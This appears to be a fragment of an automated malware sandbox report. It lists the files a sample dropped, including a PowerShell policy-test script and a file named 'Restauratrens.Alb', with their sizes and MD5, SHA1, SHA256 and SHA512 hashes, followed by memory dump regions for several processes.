        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bjnrm1zd.2rs.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Restauratrens.Alb

          Filesize

          475KB

          MD5

          c990e3d829b26e351547c77df1bc5953

          SHA1

          df0592b47bea01cc3199012205c3bf55545fb09e

          SHA256

          f2108dfabed7091171e5c3219a76a955ae6b4d4632d685ead292f346ecf99822

          SHA512

          f1f78838d6aae755d74f5dcb21b3d5b8f9100937caae28e0c7fdf6dcc39e382bc02e7040bdc4b682ac7148c987bb59f86aa3c36fa769dd85b40a0543361789da

        • memory/1284-348-0x000001AF6CBC0000-0x000001AF6CBE2000-memory.dmp

          Filesize

          136KB

        • memory/1284-353-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp

          Filesize

          10.8MB

        • memory/1284-354-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp

          Filesize

          10.8MB

        • memory/1284-355-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp

          Filesize

          10.8MB

        • memory/1284-342-0x00007FF9872D3000-0x00007FF9872D5000-memory.dmp

          Filesize

          8KB

        • memory/1284-379-0x00007FF9872D3000-0x00007FF9872D5000-memory.dmp

          Filesize

          8KB

        • memory/1284-381-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp

          Filesize

          10.8MB

        • memory/1284-409-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp

          Filesize

          10.8MB

        • memory/3412-414-0x0000000024270000-0x000000002427A000-memory.dmp

          Filesize

          40KB

        • memory/3412-404-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/3412-403-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/3412-405-0x0000000000C00000-0x0000000000C42000-memory.dmp

          Filesize

          264KB

        • memory/3412-412-0x0000000023C70000-0x0000000023CC0000-memory.dmp

          Filesize

          320KB

        • memory/3412-413-0x0000000024310000-0x00000000243A2000-memory.dmp

          Filesize

          584KB

        • memory/4232-377-0x0000000005FA0000-0x0000000005FEC000-memory.dmp

          Filesize

          304KB

        • memory/4232-389-0x0000000074F60000-0x0000000075710000-memory.dmp

          Filesize

          7.7MB

        • memory/4232-376-0x0000000005F70000-0x0000000005F8E000-memory.dmp

          Filesize

          120KB

        • memory/4232-380-0x0000000006510000-0x000000000652A000-memory.dmp

          Filesize

          104KB

        • memory/4232-371-0x0000000005990000-0x0000000005CE4000-memory.dmp

          Filesize

          3.3MB

        • memory/4232-382-0x0000000007290000-0x0000000007326000-memory.dmp

          Filesize

          600KB

        • memory/4232-383-0x0000000007170000-0x0000000007192000-memory.dmp

          Filesize

          136KB

        • memory/4232-384-0x0000000007F90000-0x0000000008534000-memory.dmp

          Filesize

          5.6MB

        • memory/4232-365-0x00000000058A0000-0x0000000005906000-memory.dmp

          Filesize

          408KB

        • memory/4232-386-0x0000000008540000-0x000000000BC9A000-memory.dmp

          Filesize

          55.4MB

        • memory/4232-388-0x0000000074F6E000-0x0000000074F6F000-memory.dmp

          Filesize

          4KB

        • memory/4232-378-0x0000000007910000-0x0000000007F8A000-memory.dmp

          Filesize

          6.5MB

        • memory/4232-390-0x0000000074F60000-0x0000000075710000-memory.dmp

          Filesize

          7.7MB

        • memory/4232-364-0x0000000005130000-0x0000000005196000-memory.dmp

          Filesize

          408KB

        • memory/4232-363-0x0000000004F90000-0x0000000004FB2000-memory.dmp

          Filesize

          136KB

        • memory/4232-362-0x0000000005200000-0x0000000005828000-memory.dmp

          Filesize

          6.2MB

        • memory/4232-406-0x0000000074F60000-0x0000000075710000-memory.dmp

          Filesize

          7.7MB

        • memory/4232-361-0x0000000074F60000-0x0000000075710000-memory.dmp

          Filesize

          7.7MB

        • memory/4232-360-0x0000000074F60000-0x0000000075710000-memory.dmp

          Filesize

          7.7MB

        • memory/4232-359-0x0000000002650000-0x0000000002686000-memory.dmp

          Filesize

          216KB

        • memory/4232-358-0x0000000074F6E000-0x0000000074F6F000-memory.dmp

          Filesize

          4KB